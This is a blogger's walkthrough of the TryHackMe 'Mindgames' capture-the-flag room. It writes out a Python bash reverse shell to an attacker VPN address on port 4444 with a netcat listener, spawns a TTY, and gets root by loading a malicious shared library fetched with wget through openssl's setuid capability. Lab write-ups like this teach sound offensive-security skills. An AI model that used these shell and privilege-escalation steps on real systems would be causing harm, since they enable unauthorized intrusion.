Mindgames — TryHackMe — Writeup

Hello. I’m Rahmos. Here is my Mindgames — TryHackMe — Writeup. Check it out!

First, deploy the machine and nmap for opend ports:

nmap -A -T4 -p- -v <ip>

There are 2 ports opened: 22 (SSH) and 80 (HTTP).

First, let’s access the website.

Okay so it’s many lines of Brainfuck program language. And also a box for us to run code. I try to paste the “Hello,World” Brainfuck line and it works!

That means you need to convert your Python code to Brainfuck language, and it can be executed here. So if I convert my python reverse shell code to Brainfuck and run, maybe I’ll get the shell also! Note that it can only run by Python, not other language.

I will use this link to decode or encode my Python code to Brainfuck. So here’s my Python code:

import os

os.system(‘bash -c “bash -i >& /dev/tcp/<my-VPN-ip>/4444 0>&1”’)

Put these lines to the link above and click encrypt, you will get the Brainfuck code back.

Start a listener on your machine:

nc -lvnp 4444

Then paste the Brainfuck code to the website and run, you will have the shell!

Now I’m in! Move around and get the 1st flag:

Now I’ll find a way to own root and get the final flag. Spawn a tty shell for stability using Python:

python3 -c ‘import pty; pty.spawn(“/bin/bash”)’

First, let’s try sudo -l to see if mindgames can run sudo:

Uh oh! I haven’t known mindgames’s password yet, so I cannot run sudo now. Let’s try another way. This time, use Capabilities:

getcap -r / 2>/dev/null

The “openssl” has the setuid cap. Which means, I can use openssl to setuid to 0 (root’s uid) and become root. Look at openssl | GTFOBins:

OpenSSL can execute code via a library. So, I can code a simple C program to setuid(0), compile it to a library and use Openssl to exec it. I’ll use this link for reference.

My program will look like this:

Now, compile this .c file and make it a library, then transfer to the target machine.

gcc -fPIC -o shellroot.o -c shellroot.c

gcc -shared -o shellroot.so -lcrypto shellroot.o

These 2 commands will compile the C program to a library called “shellroot.so”:

now start a http server from your machine:

python3 -m http.server 9000

or python2:

python2 SimpleHTTPServer 9000

then from the target machine, cd /tmp and:

wget http://<your-VPN-ip>:9000/shellroot.so

The library has been transferred successfully! Now use OpenSSL to exec this lib:

openssl req -engine /tmp/shellroot.so

Now I’m root! Get the final flag:

The end.

HAPPY HACKING

I’m Groot